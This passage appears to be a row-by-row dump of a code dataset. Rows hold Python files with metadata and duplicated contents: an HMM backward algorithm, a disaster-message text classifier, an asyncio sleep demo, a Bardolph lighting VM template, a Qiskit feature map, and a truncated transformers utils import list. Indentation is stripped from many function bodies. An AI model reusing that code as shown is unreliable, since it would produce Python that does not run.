return np.log(1/2)
elif l == 1.0 and b != 6.0:
return np.log(1/10)
# k and l: state indices
def la(k,l):
if k == 0.0 and l == 0.0:
return np.log(0.95)
elif k == 0.0 and l == 1.0:
return np.log(0.05)
elif k == 1.0 and l == 0.0:
return np.log(0.1)
    elif k == 1.0 and l == 1.0:
return np.log(0.9)
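# Backward algorithm in log space for the two-state HMM (state 0: fair die, state 1: loaded die);
# b[k, j] is the log backward variable and the final logsumexp gives log P(x).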
def Back_Log(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
b[0,n-1] = np.log(1)
b[1,n-1] = np.log(1)
for i in range(1,n-1):
j = (n-1)-i
for k in range(0,2):
b[k,j] = logsumexp([la(k,0) + le(0,x[j+1]) + b[0,j+1], la(k,1) + le(1,x[j+1]) + b[1,j+1]])
lp = logsumexp([log05 + le(0,x[1]) + b[0,1], log05 + le(1,x[1]) + b[1,1]])
return np.exp(lp)
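# Same backward recursion, but with per-position scaling factors s[j] to avoid underflow;
# P(x) is recovered as the product of the scaling factors.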
def Back_Scale(x):
x = np.insert(x,0,0)
n = x.shape[0]
b = np.zeros([2,n])
s = np.zeros(n)
b[0,n-1] = 1
b[1,n-1] = 1
for i in range(1,n):
j = (n-1)-i
if j == 0:
s[j+1] = 0.5*e(0,x[j+1])*b[0,j+1] + 0.5*e(1,x[j+1])*b[1,j+1]
else:
s[j+1] = (a(0,0)+a(1,0))*e(0,x[j+1])*b[0,j+1] + (a(0,1)+a(1,1))*e(1,x[j+1])*b[1,j+1]
for k in range(0,2):
b[k,j] = (1/s[j+1]) * (a(k,0)*e(0,x[j+1])*b[0,j+1] + a(k,1) * e(1,x[j+1])*b[1,j+1])
return np.prod(s[1:])
print("Back_Log_result:{}".format(Back_Log(x)))
print("Back_Scale_result:{}".format(Back_Scale(x))) | ja | 0.993823 | #lが状態番号、bがx #kとlは状態番号 #lは状態番号、bはx #kとlは状態番号 | 3.044878 | 3 |
models/train_classifier.py | explorer70/DisasterRecoveryNLP | 0 | 6632495 | import sys
import pandas as pd
import pickle
from sqlalchemy import create_engine
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multioutput import MultiOutputClassifier
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import GridSearchCV
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
def load_data(database_filepath):
    '''The function loads data from the sqlite database at the provided path.
    It returns the features X, labels Y and the label names.'''
engine = create_engine('sqlite:///'+database_filepath)
df = pd.read_sql("select * from Messages", engine)
print ('Loaded: ', df.shape)
# drop data with no categories assigned
df = df[df['cat_num']>0]
X = df['message']
Y = df.iloc[:, 4:-1]
return X, Y, Y.columns
def tokenize(text):
'''The function will remove punctuation, normalize the text case, lemmatize and remove the stop words'''
stop_words = stopwords.words("english")
lemmatizer = WordNetLemmatizer()
# normalize case and remove punctuation
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
text = text.lower()
# tokenize text
tokens = word_tokenize(text)
# lemmatize and remove stop words
tokens = [lemmatizer.lemmatize(word) for word in tokens if word not in stop_words]
return tokens
class TextLengthExtractor(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of characters in each message'''
def fit(self, X, y=None):
return self
def transform(self, X):
X_len = pd.Series(X).apply(lambda x: len(x))
#print(pd.DataFrame(X_len))
return pd.DataFrame(X_len)
class POSCounter(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of nouns, verbs and adjectives for each message'''
def pos_counts(self, text):
sentence_list = nltk.sent_tokenize(text)
noun_count = 0
verb_count = 0
adj_count = 0
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
for w, tag in pos_tags:
# print (w,tag)
if (tag=='NN'): noun_count+=1
elif (tag=='VBZ'): verb_count+=1
elif (tag=='JJ'): adj_count+=1
return noun_count, verb_count, adj_count
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.pos_counts)
columns = ['noun_count', 'verb_count', 'adj_count']
# source: https://stackoverflow.com/questions/53402584/how-to-convert-a-series-of-tuples-into-a-pandas-dataframe
df = pd.DataFrame([[a,b,c] for a,b,c in X_tagged.values], columns=columns)
df.head()
return df
def build_model():
    '''The function returns a pipeline containing a model definition.'''
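    # FeatureUnion combines the TF-IDF text pipeline with the hand-crafted
    # POS-count and message-length features before the multi-output MLP classifier.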
pipeline_mlp = Pipeline([
('features', FeatureUnion([
('text_pipeline', Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer())
])),
('pos_counts', POSCounter()),
('text_len', TextLengthExtractor())
])),
('clf', MultiOutputClassifier(MLPClassifier(hidden_layer_sizes=(10,))))
])
return pipeline_mlp
def evaluate_model(model, X_test, Y_test, category_names):
    '''Evaluate multi-output classification results and print out the metrics.'''
predictions = model.predict(X_test)
print(classification_report(Y_test, predictions, target_names=category_names))
return
def save_model(model, model_filepath):
'''Saves the model into a pickle file provided.'''
pickle.dump(model, open(model_filepath, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | import sys
import pandas as pd
import pickle
from sqlalchemy import create_engine
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.multioutput import MultiOutputClassifier
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.model_selection import GridSearchCV
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.ensemble import RandomForestClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
nltk.download('averaged_perceptron_tagger')
def load_data(database_filepath):
    '''The function loads data from the sqlite database at the provided path.
    It returns the features X, labels Y and the label names.'''
engine = create_engine('sqlite:///'+database_filepath)
df = pd.read_sql("select * from Messages", engine)
print ('Loaded: ', df.shape)
# drop data with no categories assigned
df = df[df['cat_num']>0]
X = df['message']
Y = df.iloc[:, 4:-1]
return X, Y, Y.columns
def tokenize(text):
'''The function will remove punctuation, normalize the text case, lemmatize and remove the stop words'''
stop_words = stopwords.words("english")
lemmatizer = WordNetLemmatizer()
# normalize case and remove punctuation
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
text = text.lower()
# tokenize text
tokens = word_tokenize(text)
# lemmatize and remove stop words
tokens = [lemmatizer.lemmatize(word) for word in tokens if word not in stop_words]
return tokens
class TextLengthExtractor(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of characters in each message'''
def fit(self, X, y=None):
return self
def transform(self, X):
X_len = pd.Series(X).apply(lambda x: len(x))
#print(pd.DataFrame(X_len))
return pd.DataFrame(X_len)
class POSCounter(BaseEstimator, TransformerMixin):
'''The custom transformer will return the number of nouns, verbs and adjectives for each message'''
def pos_counts(self, text):
sentence_list = nltk.sent_tokenize(text)
noun_count = 0
verb_count = 0
adj_count = 0
for sentence in sentence_list:
pos_tags = nltk.pos_tag(tokenize(sentence))
for w, tag in pos_tags:
# print (w,tag)
if (tag=='NN'): noun_count+=1
elif (tag=='VBZ'): verb_count+=1
elif (tag=='JJ'): adj_count+=1
return noun_count, verb_count, adj_count
def fit(self, X, y=None):
return self
def transform(self, X):
X_tagged = pd.Series(X).apply(self.pos_counts)
columns = ['noun_count', 'verb_count', 'adj_count']
# source: https://stackoverflow.com/questions/53402584/how-to-convert-a-series-of-tuples-into-a-pandas-dataframe
df = pd.DataFrame([[a,b,c] for a,b,c in X_tagged.values], columns=columns)
df.head()
return df
def build_model():
    '''The function returns a pipeline containing a model definition.'''
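    # FeatureUnion combines the TF-IDF text pipeline with the hand-crafted
    # POS-count and message-length features before the multi-output MLP classifier.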
pipeline_mlp = Pipeline([
('features', FeatureUnion([
('text_pipeline', Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer())
])),
('pos_counts', POSCounter()),
('text_len', TextLengthExtractor())
])),
('clf', MultiOutputClassifier(MLPClassifier(hidden_layer_sizes=(10,))))
])
return pipeline_mlp
def evaluate_model(model, X_test, Y_test, category_names):
    '''Evaluate multi-output classification results and print out the metrics.'''
predictions = model.predict(X_test)
print(classification_report(Y_test, predictions, target_names=category_names))
return
def save_model(model, model_filepath):
'''Saves the model into a pickle file provided.'''
pickle.dump(model, open(model_filepath, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y, category_names = load_data(database_filepath)
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2)
print('Building model...')
model = build_model()
print('Training model...')
model.fit(X_train, Y_train)
print('Evaluating model...')
evaluate_model(model, X_test, Y_test, category_names)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the disaster messages database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_classifier.py ../data/DisasterResponse.db classifier.pkl')
if __name__ == '__main__':
main() | en | 0.640667 | The functions loads data from sqlite database providd the path It returns the features X, labels Y and the label names. # drop data with no categories assigned The function will remove punctuation, normalize the text case, lemmatize and remove the stop words # normalize case and remove punctuation # tokenize text # lemmatize and remove stop words The custom transformer will return the number of characters in each message #print(pd.DataFrame(X_len)) The custom transformer will return the number of nouns, verbs and adjectives for each message # print (w,tag) # source: https://stackoverflow.com/questions/53402584/how-to-convert-a-series-of-tuples-into-a-pandas-dataframe The function returns a pipeline containing a model defition. Evaluate Multioutput claffication results and print out the metrics. Saves the model into a pickle file provided. | 2.871366 | 3 |
standard_lib/async_sleep_sync.py | DahlitzFlorian/python-snippets | 29 | 6632496 | <reponame>DahlitzFlorian/python-snippets
"""
Async snippet demonstrating the usage of time.sleep()
"""
import asyncio
import time
from datetime import datetime
async def custom_sleep():
print("SLEEP", datetime.now())
time.sleep(1)
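    # time.sleep() is a blocking call: it stalls the event loop, so the two
    # factorial tasks run one after another instead of interleaving
    # (asyncio.sleep() would yield control instead).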
async def factorial(name, number):
f = 1
for i in range(2, number + 1):
print(f"Task {name}: Compute factorial({i})")
await custom_sleep()
f *= i
print(f"Task {name}: factorial({number}) is {i}\n")
start = time.time()
loop = asyncio.get_event_loop()
tasks = [
asyncio.ensure_future(factorial("A", 3)),
asyncio.ensure_future(factorial("B", 4)),
]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
end = time.time()
print(f"Total time: {end - start}")
| """
Async snippet demonstrating the usage of time.sleep()
"""
import asyncio
import time
from datetime import datetime
async def custom_sleep():
print("SLEEP", datetime.now())
time.sleep(1)
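    # time.sleep() is a blocking call: it stalls the event loop, so the two
    # factorial tasks run one after another instead of interleaving
    # (asyncio.sleep() would yield control instead).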
async def factorial(name, number):
f = 1
for i in range(2, number + 1):
print(f"Task {name}: Compute factorial({i})")
await custom_sleep()
f *= i
print(f"Task {name}: factorial({number}) is {i}\n")
start = time.time()
loop = asyncio.get_event_loop()
tasks = [
asyncio.ensure_future(factorial("A", 3)),
asyncio.ensure_future(factorial("B", 4)),
]
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
end = time.time()
print(f"Total time: {end - start}") | en | 0.736647 | Async snippet demonstrating the usage of time.sleep() | 4.000955 | 4 |
bardolph/controller/lsc_template.py | al-fontes-jr/bardolph | 0 | 6632497 | #!/usr/bin/env python
import argparse
import logging
from bardolph.lib import injection
from bardolph.lib import settings
from bardolph.controller import arg_helper
from bardolph.controller import config_values
from bardolph.controller import light_module
from bardolph.controller.units import UnitMode
from bardolph.vm import machine
from bardolph.vm.instruction import Instruction, OpCode
from bardolph.vm.vm_codes import IoOp, JumpCondition, LoopVar, Operand, Operator
from bardolph.vm.vm_codes import Register, SetOp
_assembly = [
#instructions
]
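# Operand count per opcode, used by build_instructions() to decode the flat
# _assembly list into Instruction objects.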
_param_counts = {op_code: 0 for op_code in (OpCode.BREAKPOINT, OpCode.COLOR,
OpCode.DISC, OpCode.END_LOOP, OpCode.GET_COLOR, OpCode.LOOP, OpCode.NOP,
OpCode.PAUSE, OpCode.STOP, OpCode.POWER, OpCode.WAIT)}
_param_counts.update({op_code: 1 for op_code in (OpCode.DISCM, OpCode.DNEXT,
OpCode.END, OpCode.JSR, OpCode.OP, OpCode.POP, OpCode.PUSH, OpCode.PUSHQ,
OpCode.ROUTINE)})
_param_counts.update({op_code: 2 for op_code in (OpCode.CONSTANT, OpCode.DNEXTM,
OpCode.JUMP, OpCode.MOVE, OpCode.MOVEQ, OpCode.OUT, OpCode.PARAM,
OpCode.TIME_PATTERN)})
def get_assembly():
current_instruction = 0
while current_instruction < len(_assembly):
value = _assembly[current_instruction]
current_instruction += 1
yield value
def build_instructions():
program = []
it = iter(get_assembly())
op_code = next(it, None)
while op_code is not None:
param_count = _param_counts[OpCode(op_code)]
param0 = None if param_count < 1 else next(it)
param1 = None if param_count < 2 else next(it)
program.append(Instruction(op_code, param0, param1))
op_code = next(it, None)
return program
def main():
injection.configure()
ap = argparse.ArgumentParser()
ap.add_argument(
'-v', '--verbose', help='do debug-level logging', action='store_true')
ap.add_argument(
'-f', '--fakes', help='use fake lights', action='store_true')
arg_helper.add_n_argument(ap)
args = ap.parse_args()
overrides = {
'sleep_time': 0.1
}
if args.verbose:
overrides['log_level'] = logging.DEBUG
overrides['log_to_console'] = True
if args.fakes:
overrides['use_fakes'] = True
n_arg = arg_helper.get_overrides(args)
if n_arg is not None and not args.fakes:
overrides.update(n_arg)
settings_init = settings.using(config_values.functional)
settings_init.add_overrides(overrides).configure()
light_module.configure()
machine.Machine().run(build_instructions())
if __name__ == '__main__':
main()
| #!/usr/bin/env python
import argparse
import logging
from bardolph.lib import injection
from bardolph.lib import settings
from bardolph.controller import arg_helper
from bardolph.controller import config_values
from bardolph.controller import light_module
from bardolph.controller.units import UnitMode
from bardolph.vm import machine
from bardolph.vm.instruction import Instruction, OpCode
from bardolph.vm.vm_codes import IoOp, JumpCondition, LoopVar, Operand, Operator
from bardolph.vm.vm_codes import Register, SetOp
_assembly = [
#instructions
]
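# Operand count per opcode, used by build_instructions() to decode the flat
# _assembly list into Instruction objects.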
_param_counts = {op_code: 0 for op_code in (OpCode.BREAKPOINT, OpCode.COLOR,
OpCode.DISC, OpCode.END_LOOP, OpCode.GET_COLOR, OpCode.LOOP, OpCode.NOP,
OpCode.PAUSE, OpCode.STOP, OpCode.POWER, OpCode.WAIT)}
_param_counts.update({op_code: 1 for op_code in (OpCode.DISCM, OpCode.DNEXT,
OpCode.END, OpCode.JSR, OpCode.OP, OpCode.POP, OpCode.PUSH, OpCode.PUSHQ,
OpCode.ROUTINE)})
_param_counts.update({op_code: 2 for op_code in (OpCode.CONSTANT, OpCode.DNEXTM,
OpCode.JUMP, OpCode.MOVE, OpCode.MOVEQ, OpCode.OUT, OpCode.PARAM,
OpCode.TIME_PATTERN)})
def get_assembly():
current_instruction = 0
while current_instruction < len(_assembly):
value = _assembly[current_instruction]
current_instruction += 1
yield value
def build_instructions():
program = []
it = iter(get_assembly())
op_code = next(it, None)
while op_code is not None:
param_count = _param_counts[OpCode(op_code)]
param0 = None if param_count < 1 else next(it)
param1 = None if param_count < 2 else next(it)
program.append(Instruction(op_code, param0, param1))
op_code = next(it, None)
return program
def main():
injection.configure()
ap = argparse.ArgumentParser()
ap.add_argument(
'-v', '--verbose', help='do debug-level logging', action='store_true')
ap.add_argument(
'-f', '--fakes', help='use fake lights', action='store_true')
arg_helper.add_n_argument(ap)
args = ap.parse_args()
overrides = {
'sleep_time': 0.1
}
if args.verbose:
overrides['log_level'] = logging.DEBUG
overrides['log_to_console'] = True
if args.fakes:
overrides['use_fakes'] = True
n_arg = arg_helper.get_overrides(args)
if n_arg is not None and not args.fakes:
overrides.update(n_arg)
settings_init = settings.using(config_values.functional)
settings_init.add_overrides(overrides).configure()
light_module.configure()
machine.Machine().run(build_instructions())
if __name__ == '__main__':
main()
| ru | 0.172319 | #!/usr/bin/env python #instructions | 2.035261 | 2 |
qiskit/aqua/components/feature_maps/pauli_expansion.py | aaita92/qiskit-aqua | 2 | 6632498 | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
This module contains the definition of a base class for
feature map. Several types of commonly used approaches.
"""
from typing import Optional, Callable, List
import itertools
import logging
import numpy as np
from qiskit import QuantumCircuit, QuantumRegister
from qiskit.quantum_info import Pauli
from qiskit.qasm import pi
from qiskit.aqua.operators import evolution_instruction
from qiskit.aqua.utils.validation import validate_min, validate_in_set
from .feature_map import FeatureMap
from .data_mapping import self_product
logger = logging.getLogger(__name__)
# pylint: disable=invalid-name
class PauliExpansion(FeatureMap):
"""
Mapping data with the second order expansion followed by entangling gates.
Refer to https://arxiv.org/pdf/1804.11326.pdf for details.
"""
def __init__(self,
feature_dimension: int,
depth: int = 2,
entangler_map: Optional[List[List[int]]] = None,
entanglement: str = 'full',
paulis: Optional[List[str]] = None,
data_map_func: Callable[[np.ndarray], float] = self_product) -> None:
"""Constructor.
Args:
feature_dimension: number of features
depth: the number of repeated circuits. Defaults to 2,
has a min. value of 1.
entangler_map: describe the connectivity of qubits, each list describes
[source, target], or None for full entanglement.
                Note that the order of the list is the order of
applying the two-qubit gate.
entanglement: ['full', 'linear'], generate the qubit
connectivity by predefined topology.
Defaults to full
paulis: a list of strings for to-be-used paulis.
Defaults to None. If None, ['Z', 'ZZ'] will be used.
data_map_func: a mapping function for data x
"""
paulis = paulis if paulis is not None else ['Z', 'ZZ']
validate_min('depth', depth, 1)
validate_in_set('entanglement', entanglement, {'full', 'linear'})
super().__init__()
self._num_qubits = self._feature_dimension = feature_dimension
self._depth = depth
if entangler_map is None:
self._entangler_map = self.get_entangler_map(entanglement, feature_dimension)
else:
self._entangler_map = self.validate_entangler_map(entangler_map, feature_dimension)
self._pauli_strings = self._build_subset_paulis_string(paulis)
self._data_map_func = data_map_func
self._support_parameterized_circuit = True
def _build_subset_paulis_string(self, paulis):
# fill out the paulis to the number of qubits
temp_paulis = []
for pauli in paulis:
len_pauli = len(pauli)
for possible_pauli_idx in itertools.combinations(range(self._num_qubits), len_pauli):
string_temp = ['I'] * self._num_qubits
for idx, _ in enumerate(possible_pauli_idx):
string_temp[-possible_pauli_idx[idx] - 1] = pauli[-idx - 1]
temp_paulis.append(''.join(string_temp))
# clean up string that can not be entangled.
final_paulis = []
for pauli in temp_paulis:
where_z = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
if len(where_z) == 1:
final_paulis.append(pauli)
else:
is_valid = True
for src, targ in itertools.combinations(where_z, 2):
if [src, targ] not in self._entangler_map:
is_valid = False
break
if is_valid:
final_paulis.append(pauli)
else:
logger.warning("Due to the limited entangler_map,"
" %s is skipped.", pauli)
logger.info("Pauli terms include: %s", final_paulis)
return final_paulis
def _extract_data_for_rotation(self, pauli, x):
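        # Select the components of x that act on the non-identity qubits of this Pauli term.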
where_non_i = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
x = np.asarray(x)
return x[where_non_i]
def construct_circuit(self, x, qr=None, inverse=False):
"""
Construct the second order expansion based on given data.
Args:
x (Union(numpy.ndarray, list[Parameter], ParameterVector)): 1-D to-be-transformed data.
qr (QuantumRegister, optional): the QuantumRegister object for the circuit, if None,
generate new registers with name q.
inverse (bool, optional): whether or not inverse the circuit
Returns:
QuantumCircuit: a quantum circuit transform data x.
Raises:
TypeError: invalid input
ValueError: invalid input
"""
if len(x) != self._num_qubits:
raise ValueError("number of qubits and data dimension must be the same.")
if qr is None:
qr = QuantumRegister(self._num_qubits, name='q')
qc = QuantumCircuit(qr)
for _ in range(self._depth):
for i in range(self._num_qubits):
qc.u2(0, pi, qr[i])
for pauli in self._pauli_strings:
coeff = self._data_map_func(self._extract_data_for_rotation(pauli, x))
p = Pauli.from_label(pauli)
inst = evolution_instruction([[1, p]], coeff, 1)
qc.append(inst, qr)
return qc
| # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
This module contains the definition of a base class for
feature map. Several types of commonly used approaches.
"""
from typing import Optional, Callable, List
import itertools
import logging
import numpy as np
from qiskit import QuantumCircuit, QuantumRegister
from qiskit.quantum_info import Pauli
from qiskit.qasm import pi
from qiskit.aqua.operators import evolution_instruction
from qiskit.aqua.utils.validation import validate_min, validate_in_set
from .feature_map import FeatureMap
from .data_mapping import self_product
logger = logging.getLogger(__name__)
# pylint: disable=invalid-name
class PauliExpansion(FeatureMap):
"""
Mapping data with the second order expansion followed by entangling gates.
Refer to https://arxiv.org/pdf/1804.11326.pdf for details.
"""
def __init__(self,
feature_dimension: int,
depth: int = 2,
entangler_map: Optional[List[List[int]]] = None,
entanglement: str = 'full',
paulis: Optional[List[str]] = None,
data_map_func: Callable[[np.ndarray], float] = self_product) -> None:
"""Constructor.
Args:
feature_dimension: number of features
depth: the number of repeated circuits. Defaults to 2,
has a min. value of 1.
entangler_map: describe the connectivity of qubits, each list describes
[source, target], or None for full entanglement.
                Note that the order of the list is the order of
applying the two-qubit gate.
entanglement: ['full', 'linear'], generate the qubit
connectivity by predefined topology.
Defaults to full
paulis: a list of strings for to-be-used paulis.
Defaults to None. If None, ['Z', 'ZZ'] will be used.
data_map_func: a mapping function for data x
"""
paulis = paulis if paulis is not None else ['Z', 'ZZ']
validate_min('depth', depth, 1)
validate_in_set('entanglement', entanglement, {'full', 'linear'})
super().__init__()
self._num_qubits = self._feature_dimension = feature_dimension
self._depth = depth
if entangler_map is None:
self._entangler_map = self.get_entangler_map(entanglement, feature_dimension)
else:
self._entangler_map = self.validate_entangler_map(entangler_map, feature_dimension)
self._pauli_strings = self._build_subset_paulis_string(paulis)
self._data_map_func = data_map_func
self._support_parameterized_circuit = True
def _build_subset_paulis_string(self, paulis):
# fill out the paulis to the number of qubits
temp_paulis = []
for pauli in paulis:
len_pauli = len(pauli)
for possible_pauli_idx in itertools.combinations(range(self._num_qubits), len_pauli):
string_temp = ['I'] * self._num_qubits
for idx, _ in enumerate(possible_pauli_idx):
string_temp[-possible_pauli_idx[idx] - 1] = pauli[-idx - 1]
temp_paulis.append(''.join(string_temp))
# clean up string that can not be entangled.
final_paulis = []
for pauli in temp_paulis:
where_z = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
if len(where_z) == 1:
final_paulis.append(pauli)
else:
is_valid = True
for src, targ in itertools.combinations(where_z, 2):
if [src, targ] not in self._entangler_map:
is_valid = False
break
if is_valid:
final_paulis.append(pauli)
else:
logger.warning("Due to the limited entangler_map,"
" %s is skipped.", pauli)
logger.info("Pauli terms include: %s", final_paulis)
return final_paulis
def _extract_data_for_rotation(self, pauli, x):
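        # Select the components of x that act on the non-identity qubits of this Pauli term.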
where_non_i = np.where(np.asarray(list(pauli[::-1])) != 'I')[0]
x = np.asarray(x)
return x[where_non_i]
def construct_circuit(self, x, qr=None, inverse=False):
"""
Construct the second order expansion based on given data.
Args:
x (Union(numpy.ndarray, list[Parameter], ParameterVector)): 1-D to-be-transformed data.
qr (QuantumRegister, optional): the QuantumRegister object for the circuit, if None,
generate new registers with name q.
inverse (bool, optional): whether or not inverse the circuit
Returns:
QuantumCircuit: a quantum circuit transform data x.
Raises:
TypeError: invalid input
ValueError: invalid input
"""
if len(x) != self._num_qubits:
raise ValueError("number of qubits and data dimension must be the same.")
if qr is None:
qr = QuantumRegister(self._num_qubits, name='q')
qc = QuantumCircuit(qr)
for _ in range(self._depth):
for i in range(self._num_qubits):
qc.u2(0, pi, qr[i])
for pauli in self._pauli_strings:
coeff = self._data_map_func(self._extract_data_for_rotation(pauli, x))
p = Pauli.from_label(pauli)
inst = evolution_instruction([[1, p]], coeff, 1)
qc.append(inst, qr)
return qc
| en | 0.751068 | # -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2018, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. This module contains the definition of a base class for feature map. Several types of commonly used approaches. # pylint: disable=invalid-name Mapping data with the second order expansion followed by entangling gates. Refer to https://arxiv.org/pdf/1804.11326.pdf for details. Constructor. Args: feature_dimension: number of features depth: the number of repeated circuits. Defaults to 2, has a min. value of 1. entangler_map: describe the connectivity of qubits, each list describes [source, target], or None for full entanglement. Note that the order is the list is the order of applying the two-qubit gate. entanglement: ['full', 'linear'], generate the qubit connectivity by predefined topology. Defaults to full paulis: a list of strings for to-be-used paulis. Defaults to None. If None, ['Z', 'ZZ'] will be used. data_map_func: a mapping function for data x # fill out the paulis to the number of qubits # clean up string that can not be entangled. Construct the second order expansion based on given data. Args: x (Union(numpy.ndarray, list[Parameter], ParameterVector)): 1-D to-be-transformed data. qr (QuantumRegister, optional): the QuantumRegister object for the circuit, if None, generate new registers with name q. inverse (bool, optional): whether or not inverse the circuit Returns: QuantumCircuit: a quantum circuit transform data x. Raises: TypeError: invalid input ValueError: invalid input | 2.26276 | 2 |
src/transformers/utils/__init__.py | aakashb95/transformers | 0 | 6632499 | #!/usr/bin/env python
# coding=utf-8
# flake8: noqa
# There's no way to ignore "F401 '...' imported but unused" warnings in this
# module, but to preserve other warnings. So, don't check this module at all.
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from packaging import version
from .. import __version__
from .doc import (
add_code_sample_docstrings,
add_end_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
copy_func,
replace_return_docstrings,
)
from .generic import (
ContextManagers,
ExplicitEnum,
ModelOutput,
PaddingStrategy,
TensorType,
cached_property,
find_labels,
flatten_dict,
is_tensor,
to_numpy,
to_py_obj,
)
from .hub import (
CLOUDFRONT_DISTRIB_PREFIX,
DISABLE_TELEMETRY,
HF_MODULES_CACHE,
HUGGINGFACE_CO_PREFIX,
HUGGINGFACE_CO_RESOLVE_ENDPOINT,
PYTORCH_PRETRAINED_BERT_CACHE,
PYTORCH_TRANSFORMERS_CACHE,
S3_BUCKET_PREFIX,
TRANSFORMERS_CACHE,
TRANSFORMERS_DYNAMIC_MODULE_NAME,
EntryNotFoundError,
PushToHubMixin,
RepositoryNotFoundError,
RevisionNotFoundError,
cached_path,
default_cache_path,
define_sagemaker_information,
filename_to_url,
get_cached_models,
get_file_from_repo,
get_from_cache,
get_full_repo_name,
get_list_of_files,
has_file,
hf_bucket_url,
http_get,
http_user_agent,
is_local_clone,
is_offline_mode,
is_remote_url,
send_example_telemetry,
url_to_filename,
)
from .import_utils import (
ENV_VARS_TRUE_AND_AUTO_VALUES,
ENV_VARS_TRUE_VALUES,
TORCH_FX_REQUIRED_VERSION,
USE_JAX,
USE_TF,
USE_TORCH,
DummyObject,
OptionalDependencyNotAvailable,
_LazyModule,
is_accelerate_available,
is_apex_available,
is_bitsandbytes_available,
is_coloredlogs_available,
is_datasets_available,
is_detectron2_available,
is_faiss_available,
is_flax_available,
is_ftfy_available,
is_in_notebook,
is_ipex_available,
is_librosa_available,
is_onnx_available,
is_pandas_available,
is_phonemizer_available,
is_protobuf_available,
is_psutil_available,
is_py3nvml_available,
is_pyctcdecode_available,
is_pytesseract_available,
is_pytorch_quantization_available,
is_rjieba_available,
is_sagemaker_dp_enabled,
is_sagemaker_mp_enabled,
is_scatter_available,
is_scipy_available,
is_sentencepiece_available,
is_sklearn_available,
is_soundfile_availble,
